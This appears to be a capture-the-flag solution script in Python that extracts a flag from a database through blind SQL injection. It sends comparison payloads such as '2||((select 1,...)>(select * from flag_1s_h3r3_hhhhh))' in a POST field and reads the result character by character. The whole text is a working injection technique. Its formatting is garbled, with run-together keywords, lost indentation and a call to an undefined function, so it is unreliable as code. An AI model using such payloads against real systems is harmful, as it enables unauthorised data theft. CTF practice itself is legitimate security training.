deftrans(flag): res='' for i in flag: res +=hex(ord(i)) res= '0x' + res.replace("0x","") return res
flag=''
for i inrange(1,50): print(i) hexchar='' for char inrange(30,130): hexchar=trans(flag+chr(char)) payload= '2||((select 1,{})>(select * from flag_1s_h3r3_hhhhh))'.format(hexchar) data={'id':payload} r=requests.post(url=url,data=data) text=r.text if'Nu1L'in r.text: flag +=chr(char-1) print(flag) break
for i inrange(1,50): print(i) for char inrange(32,130): hexchar=add(flag+chr(char)) payload= '2||((select 1,"{}")>(select * from flag_1s_h3r3_hhhhh))'.format(hexchar) data={'id':payload} r=requests.post(url=url,data=data) text=r.text if'Nu1L'in r.text: flag +=chr(char-1) print(flag) break